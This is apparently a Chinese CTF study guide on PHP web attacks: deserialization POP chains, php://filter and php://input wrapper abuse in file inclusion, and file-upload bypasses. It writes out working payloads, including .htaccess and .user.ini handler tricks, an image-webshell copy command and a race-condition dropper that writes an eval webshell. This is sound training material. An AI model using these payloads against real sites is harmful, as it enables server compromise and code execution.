目录
2、常见php伪协议的使用
(1)php://filter
(2)php://input
3、文件上传常规操作
(1) 前端绕过
(2) 修改文件类型
(3) 配合.user.ini 或.hta***ess解析
(4) 爆破可解析后缀
(5) 针对Windows系统特性的绕过
(6) 文件包含结合图片马
(7) 条件竞争
1、php反序列化之pop链构造
常见魔术方法的触发
__construct() //创建类对象时调用 __destruct() //对象被销毁时触发 __call() //在对象中调用不可访问的方法时触发 __callStatic() //在静态方式中调用不可访问的方法时触发 __get() //调用类中不存在变量时触发(找有连续箭头的 this->a->b) __set() //给一个未定义的属性赋值时触发 __isset() //在不可访问的属性上调用isset()或empty()触发 __unset() //在不可访问的属性上使用unset()时触发 __sleep() //使用serialize()时触发 __wakeup() //执行unserialize()时触发 __toString() //当对象被当做字符串时自动调用(找echo $this->a这种、strtolower()等) __invoke() //对象被当做函数进行调用时触发(找有括号的类似$a()这种) __set_state() //使用var_export()时触发 __clone() //对象复制完成时调用 __autoload() //实例化一个未定义的类时触发 __debugInfo() //使用var_dump时触发
典型例题:[NISACTF 2022]babyserialize
NSSCTF 靶场地址:NSSCTF | 在线CTF平台
详细解题过程参考我之前的博客:https://myon6.blog.csdn.***/article/details/131565599?spm=1001.2014.3001.5502
2、常见php伪协议的使用
文件包含:
常把可重复使用的函数写入到单个文件中,在使用该函数时,直接调用此文件,而无需再次编写函数,这一过程叫做包含。有时候由于网站功能需求,会让前端用户选择要包含的文件,而开发人员又没有对要包含的文件进行安全考虑,就导致攻击者可以通过修改文件的位置来让后台执行任意文件,从而导致文件包含漏洞。
文件包含函数:
1、include 2、require 3、include_once 4、require_once 5、highlight_file 6、show_source 7、flie 8、readfile 9、file_get_contents 10、file_put_contents 11、fopen
存在文件包含时就应该想到 php 伪协议的利用
常用的 php 伪协议:
(1)php://filter
用于读取源码
可以获取指定文件源码,当它与包含函数结合时,php://filter 流会被当作 php 文件执行,所以我们一般对其进行编码,让其不执行,从而导致任意文件读取。
convert.iconv.* 的用法:
convert.iconv.<input-encoding>.<output-encoding> 或者 convert.iconv.<input-encoding>/<output-encoding>
<input-encoding> 和 <output-encoding> 就是编码方式,有:
UCS-4* UCS-4BE UCS-4LE* UCS-2 UCS-2BE UCS-2LE UTF-32* UTF-32BE* UTF-32LE* UTF-16* UTF-16BE* UTF-16LE* UTF-7 UTF7-IMAP UTF-8* ASCII* EUC-JP* SJIS* eucJP-win* SJIS-win*
常用 payload :
最常见的编码方式: ?file=php://filter/read=convert.base64-encode/resource=flag.php 替换编码方式绕过的例子: ?file=php://filter//convert.iconv.SJIS*.UCS-4*/resource=flag.php ?file=php://filter/convert.iconv.utf8.utf16/resource=flag.php
(2)php://input
用于执行 PHP 代码
可以访问请求的原始数据的只读流,将post请求的数据当作 php 代码执行,当传入的参数作为文件名打开时,可以将参数设为php://input,同时 post 写入想要执行的 php 代码,php 执行时会将 post 内容当作文件内容,从而导致任意代码执行。
例如: http://127.0.0.1/cmd.php?cmd=php://input POST数据:<?php phpinfo()?>
典型例题:攻防世界的 fileclude 和 file_include
攻防世界靶场地址:https://adworld.xctf.org.***/
详细解题过程可以参考我之前的博客:
https://myon6.blog.csdn.***/article/details/130188333
https://myon6.blog.csdn.***/article/details/130176864
3、文件上传常规操作
(1) 前端绕过
使用 BurpSuite 抓包改后缀即可
(2) 修改文件类型
将 Content-Type 改为 image/jpeg
(3) 配合.user.ini 或.hta***ess解析
这两个配置文件都可以使我们上传的图像类文件被当作php文件解析
关于这两个文件的基本内容:
.hta***ess
<FilesMatch ".jpg">
SetHandler application/x-httpd-php
</FilesMatch>
.user.ini
auto_prepend_file=my.jpg
等号后面的 my.jpg 就是你要上传的 jpg 类型的一句话木马的文件名
(4) 爆破可解析后缀
使用burpsuite爆破可能被解析的后缀
比如:
php2、php3、php4、php5、phps、pht、phtm、phtml、phpt、shtml 、pwml等等
(也可以结合大小写绕过)
(5) 针对Windows系统特性的绕过
空格绕过、点绕过、::$DATA绕过
原理:Windows系统对于文件的重命名会自动把空格、点、::$DATA 去掉
因此我们可以在文件后缀添加空格、点、::$DATA 进行绕过(是在 burpsuite 抓包后修改)
(6) 文件包含结合图片马
文件包含漏洞:是指未对文件进行严格过滤,在代码中引入其他文件作为php文件执行。
图片马生成可以使用copy命令
copy 1.jpg/b + shell.php 2.jpg
生成的2.jpg就是一个图片马
(7) 条件竞争
条件竞争原理:当我们成功上传了php文件,服务端会在短时间内将其删除,我们需要抢在它删除之前访问文件并生成一句话木马文件,所以访问包的线程需要大于上传包的线程。
上传的大致内容为:
<?php fputs(fopen("shell.php", "w"), '<?php @eval($_POST["shell"]); ?>'); ?>
需要结合 burpsuite 设置上传包和访问包的线程数
详细解释参考我之前的博客:https://myon6.blog.csdn.***/article/details/133562672